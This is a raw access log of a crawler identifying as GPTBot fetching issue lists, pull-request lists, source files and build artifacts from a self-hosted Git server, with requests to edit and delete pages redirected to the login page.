"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 16083] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:59:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13807] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:18:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17522] [Gzip 9.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9879] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:18:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:18:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554790] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:19:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" -[17/Feb/2026:19:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:19:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr 